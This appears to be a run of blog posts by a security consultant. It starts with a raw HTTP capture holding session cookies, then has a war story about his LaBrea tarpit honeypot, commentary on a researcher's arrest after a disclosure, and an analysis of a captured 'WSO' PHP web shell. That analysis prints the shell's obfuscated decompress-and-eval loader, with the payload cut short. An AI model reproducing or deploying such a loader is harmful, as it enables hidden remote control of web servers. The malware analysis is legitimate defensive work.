Cookie: __cfduid=d26ddac4638670fc8878c739a1861237c1464786359; spu=eyJpdiI6IlNORkNWUXJcL1ZJQ0hUT1wvd0dDVWVFdz09IiwidmFsdWUiOiJZK1dQZ3cwV1NTbjI2MVBhMWxkdkx3PT0iLCJtYWMiOiI5NDc4MGY0MzBhMzEwZTUzODQ0NjhkYTEwMmY5MjAwNzJlMTgyZGU0MDg4MjAzOThmMmY0NmFjODkwYzk5NTRhIn0%3D; spv=eyJpdiI6Ilk0SXNtZnhTZHgzMFpzaGc2bnZjcGc9PSIsInZhbHVlIjoiYkFnamV3OEYwcnp2ekJwdTVLSEF6Zz09IiwibWFjIjoiYmU4ZTExOWYzOTA5MGEwNTRjNzlkYTY2NTZmMzQyNDU1NjkzYWQ1OGU2NDE5NGE2ODQ4NDMxY2Y3ZDQ4YzkwOSJ9; spvis=eyJpdiI6IjZtaWU2SmROcFBjaWRpcWJaekY2OVE9PSIsInZhbHVlIjoiTXl3SjZPS0xQZ284T0g2K29ENDh6UT09IiwibWFjIjoiYjc3MDE5ODFlNWZlNDBmNTE1ZDJlMGYxNjFmMWU1NDEwODM3ODQ2NmI0MTIzMDA4ZDRmN2I1YTE4NjRjZmJhOCJ9; laravel_session_speedypaper=eyJpdiI6Ilpob2VoTEpTV2ZYMGRQMlwvXC9OTStwdz09IiwidmFsdWUiOiIycnFnbXVJdEJrNzZmdTJZZ2UrTjNKbDk0cjI0YjVnRm9TN0NHbHRaS2JzR1hmd2xxZ1wvQTRjMklGU2gySDFMaEJGVmtYSW9nSEswV1wvclQwWmN6TlpnPT0iLCJtYWMiOiI1NGExMWJmMmVjMTlmM2Y0Nzg4MDdjNWY2Nzk4YjNiMDVkZjRhMDI2ZGZjZjk0YjEwYzExZWNkNmQ5ZWZlMzllIn0%3D

HTTP/1.1 302
 Redirect to: http://capitol.gov/
status: 302
date: Wed, 01 Jun 2016 13:41:07 GMT
content-type: text/html; charset=UTF-8
cache-control: no-cache
location: http://capitol.gov
set-cookie: laravel_session_speedypaper=eyJpdiI6IjJ6dlZzeGk4WlMyeVwvbUxFUFZmYzNRPT0iLCJ2YWx1ZSI6Ik53NHBFcStRYVd0QzZUYU9GNnYwYytNQTNOOFEzR3YxemdWQWMyNkJBdFdYV3BxR2VSS0lYaGNtck1PQ20zcEJ2TGZvVCtPQlkxczFoc3BBMHZuck1nPT0iLCJtYWMiOiJlYTQ4MmI4NDVhZmQ1ZWZjZTkzNTA4MGQzYTUxNzhhNzQ4OWZjMDFjNDVlMTNlMDMxMzk1ZTBhNmE2NjFmNTJjIn0%3D; expires=Wed, 01-Jun-2016 15:41:07 GMT; Max-Age=7200; path=/; httponly
x-prerender-token: fbDlD1S9rFH3au9KfiDK
strict-transport-security: max-age=63072000; includeSubdomains;
x-content-type-options: nosniff
server: cloudflare-nginx
cf-ray: 2ac314d3d37910c9-ORD

Now that everything is right with the world, they fire off another tweet to which I respond:

So, they do some ‘splaining…

Ah… it’s their EEEEEeeevil competitors that have done this to them.

Now, I’m not saying that it couldn’t be their competitors - hey… anything is possible. I’m just saying that the circumstantial evidence here makes the burden of proof - for me - a bit higher than saying “we’re innocent.”

That whole redirect to 7essays thing? If it was happening all along (and I just never triggered it…) then that’s… well… problematic for your whole “we’re innocent” defense. And if it was the result of you “checking” things then… well… that’s problematic for your whole “we’re innocent” defense too. Just sayin’…

But SpeedyPaper hasn’t got a clue about how much I know. And they’re still trying to convince me that they’ve been framed:

Finally, since they’re been twitter-bombed via all the back-n-forth with SpeedyPaper, the Capitol folks show up:

And I get to pin one more tiny piece of justice on my wall…

Hey, SpeedyPaper… packets don’t lie. Research that.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 1, 2016

My office was a long, skinny, windowless affair, and the only office furniture arrangement that made sense left me sitting with my back facing the door. Those of you who have worked in IT (and especially security) know that we tend to focus on the task at hand to the exclusion of all else, so - over the years - the staff had learned various techniques to gently rouse me from “concentrating” without startling the hell out of me.

Tap… Tap… Tap…

My office door was always open, so a preferred method of getting my attention was to gently tap on the metal door frame until I realized someone was there. The overall worst method was to simply walk into my office and say something - that was pretty much guaranteed to make me startle halfway out of my chair - resulting in a very unhappy Tom.

Tap… Tap… Tap…

“Wazzup?” I said, my eyes still glued to the script I was writing to wrangle something out of the logs.

“Something just showed up for you.” It was the main receptionist, rather than the shipping clerk… something that didn’t sink in immediately.

“Ok… Can you just put it on my desk? Thanks…”

“No… You really need to come get it.”

“Whaaaaa?” I turned around and noticed the big ol’ shit-eating grin on her face. “Seriously? What is it?”

“You’ll see…”

It was big. And chock full o’ Christmasy touches - everything inside was either red or green. Some of it was both. It sat in the middle of the reception desk like a hulking, wicker ode to Holiday Spirit with the words “Harry and David” emblazoned on, literally, everything.

“Open it… Open it…” A small crowd had gathered. Getting something delivered wasn’t a “special” occurrence - rarely did a week pass where one of the ladies in the office didn’t get flowers delivered for a birthday or an anniversary - but I wasn’t a lady, and this wasn’t flowers.

“Settle down… let me look at the card first.”

“Looks like someone has a secret admirer…” You can always count on that person whenever you’re in this situation. Generally, they’re silenced with an evil glare… and I’m really good at evil glares.

I opened the attached card. It turned out to be from a mid-sized manufacturing company somewhere on the East Coast. I remembered the company name well…

It was probably mid-Novemeber when I had first noticed that I had four or five consecutive IP addresses from that company “persist-trapped” in my test version of LaBrea (the “sticky” honeypot I wrote around the time the Code-Red worm first came out to play).

The initial version of LaBrea simply monitored the network for unanswered ARP requests, and when it saw that the router was trying to send packets to an empty IP address, would answer with an ARP reply, essentially creating a “fake” system on the empty address. When TCP SYN packets were forwarded by the router, LaBrea would respond with a SYN-ACK and then simply ignore anything else. This resulted in a drastic slowdown of the attack phase of a network worm - because it would complete the three way handshake and continue to try to send data until the connection timed out. Later versions of LaBrea incorporated the idea of “persist-trapping” connections by completing the three-way handshake, and then setting the TCP window size to zero - essentially telling the attacking system that it was busy processing the data it had received. LaBrea would then answer the attacking system’s “Window Probe” packets (packets that, essentially, say “Hey! Did you forget about me?”) keeping it “on hold” indefinitely. Literally indefinitely. Seriously… I held “persist-trapped” connections open for six months or more…

I had called the company several times and left messages for their main IT manager, explaining that he had multiple compromised systems on his network - but the “persist-trapped” connections never went away. Finally, right before Thanksgiving, I got the man himself on the phone.

“Those systems can’t be compromised… we’re running AV on them.”

God, how I hate those words…

I took a deep breath and explained that while running AV was a very important preventative measure, it wasn’t a silver bullet when it came to malware. I explained that if those were his IP addresses, that there was - literally - no doubt that his systems had attacked mine, and that unless he knew a reason they should be talking to my instance of LaBrea, that he really needed to check those boxes out. When I hung up the phone, I was about 90% sure he would just ignore me.

It was about a week later when I got a return call. That, in and of itself, was pretty surprising, but the story he told me was even better. After that first call, he had decided I was some kind of loony crackpot, but later that afternoon, one of his junior guys wandered into his office with a concerned look and a printout of some firewall logs. “So what,” he’d said to the junior, “we’re getting hit all the time by worms on port 80…”

“But boss,” had come the reply, “these aren’t inbound… they’re outbound.”

The only thing that saved their company from being an enormous netmenace was that 99% of their machines needed to use a proxy for outbound HTTP access, and the worm they were infected with wasn’t proxy-aware. The other 1% had landed squarely in my tarpit.

He apologized profusely and explained that it had taken him several days to work up the nerve to call me. He also said something that has stuck with me over the years: “Sometimes the biggest mistake you can make is ‘knowing’ that you’re right.”

As it turned out, he must’ve also convinced someone at his company that they owed me a Harry and David gift basket.

Fast forward to today, and the story of Justin Shafer, a security researcher pulled from his home at 6:30am, handcuffed, and interrogated for the despicable crime of telling a dental software company that they had unencrypted patient data publicly available on an FTP server that allowed “anonymous” access.

Based on the information I’ve seen, Shafer did everything right when he discovered the patient data as a result of some Google searches. He worked with others to notify the affected company and made sure that no information on the disclosure was made public until after the data had been secured. It seems like he went above and beyond to be the epitome of “responsible disclosure.”

As a result, the affected company (who I won’t mention here because, God knows, they’ve already demonstrated that they’ve got a litigious streak a mile wide…) swore out a complaint against him claiming that Shafer had accessed the data on their unsecured anonymous FTP server “without authorization” and should be charged criminally under the Computer Fraud and Abuse Act (CFAA). Shafer was treated like a criminal and even had a bunch of his equipment confiscated while charges are being considered.

IANAL, but I find it beyond comprehension that ANY access to an unsecured anonymous FTP server could be considered “unauthorized.” The whole point of an anonymous FTP server is that it doesn’t require authentication and therefore everyone is authorized to use it.

How did this complaint possibly pass the smell test by the FBI (who were the ones arresting Shafer)? Doesn’t anyone over there know how an anonymous FTP server works?

The world has changed a lot since I first started working in security, and those changes haven’t always been for the better. Shooting the messenger is becoming an increasingly “acceptable” response of late, and its a trend that makes me wonder if trying to be a “good guy” is worth it anymore. When am I going to be dragged out of bed, handcuffed in front of my family, and face prosecution simply because I tried to explain to some random company that someone hacked their servers? When will reporting a netmence land me in jail?

I much prefer Harry and David gift baskets.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
May 31, 2016

I collect all sorts of interesting things that the bad guys of the Internet happen to leave lying around on systems they think they’ve 0wned.

Over the years, I’ve collected LOTS of malware… so, generally speaking, you probably don’t want to piss me off and then give me access to your computer.

Some of the most interesting “collectibles” I’ve managed to acquire are the tools used by attackers to ply their “trade.” As software goes, they range quite a bit in sophistication - from half-baked scripts that are destined to fail a majority of the time, all the way up to incredibly sophisticated “point-n-click” toyz that have been through hundreds of versions and incremental changes over the years.

Today, I’m going to show you one of the more interesting tools I’ve found. I’ve seen it before, but never really took the time to dig into it and see exactly what makes it tick… so how about if we take a look?

Some incredibly giving individual attempted to 0wn my webserver through a remote file inclusion attack. While the attack unfortunately failed for him… guffaw… I ended up with a copy of the file he was attempting to use.

Known as “Web Shell by orb” (or “WSO” for short…) I was gifted with a copy of version 2.4 (I did a little digging and found that it is an older version - apparently there’s much newer versions out there - v3.1 - but I suppose I shouldn’t look a gift horse in the mouth…)

It arrived as a wonderfully ugly, obfuscated 42,637 byte PHP file that was, essentially, just 6 lines long. Before doing anything else, I “beautified” the code a bit… and it ended up looking like this:

<?php

if (preg_match('!MIDP|WAP|Windows.CE|PPC|Series60|Opera.Mini|Mobile|Symbian|Android!i', $_SERVER['HTTP_USER_AGENT']) || !preg_match('!windows.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|ipad|iphone|libwww|msn|fdm|maui|webmoney!i', $_SERVER['HTTP_USER_AGENT'])) {
}

if (!function_exists("TC9A16C47DA8EEE87")) {
        function TC9A16C47DA8EEE87($T059EC46CFE335260)
        {
                $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
                $TC9A16C47DA8EEE87 = 0;
                $TA7FB8B0A1C0E2E9E = 0;
                $T17D35BB9DF7A47E4 = 0;
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
                $TBF14159DC7D007D3 = 3;
                $T77605D5F26DD5248 = 0;
                $T4A747C3263CA7A55 = 16;
                $T7C7E72B89B83E235 = "";
                $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
                $T43D5686285035C13 = __FILE__;
                $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
                $T6BBC58A3B5B11DC4 = 0;
                preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv") , $T43D5686285035C13, $T6BBC58A3B5B11DC4);
                for (; $TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
                        if (count($T6BBC58A3B5B11DC4)) exit;
                        if ($T4A747C3263CA7A55 == 0) {
                                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                                $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                                $T4A747C3263CA7A55 = 16;
                        }

                        if ($T65CE9F6823D588A7 & 0x8000) {
                                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                                $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                                if ($TC9A16C47DA8EEE87) {
                                        $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                                        for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                                        $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                                }
                                else {
                                        $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                                        $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                                        for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                                        $TBF14159DC7D007D3++;
                                        $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                                }
                        }
                        else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
                        $T65CE9F6823D588A7 <<= 1;
                        $T4A747C3263CA7A55--;
                        if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                                return $T43D5686285035C13;
                        }
                }
        }
}

eval(TC9A16C47DA8EEE87("QAIAPD9waHAgABEkY2...[approximately 40,000 characters]...QF8MISgnAr8CsQkgSFB0AHA/Pg==")); ?>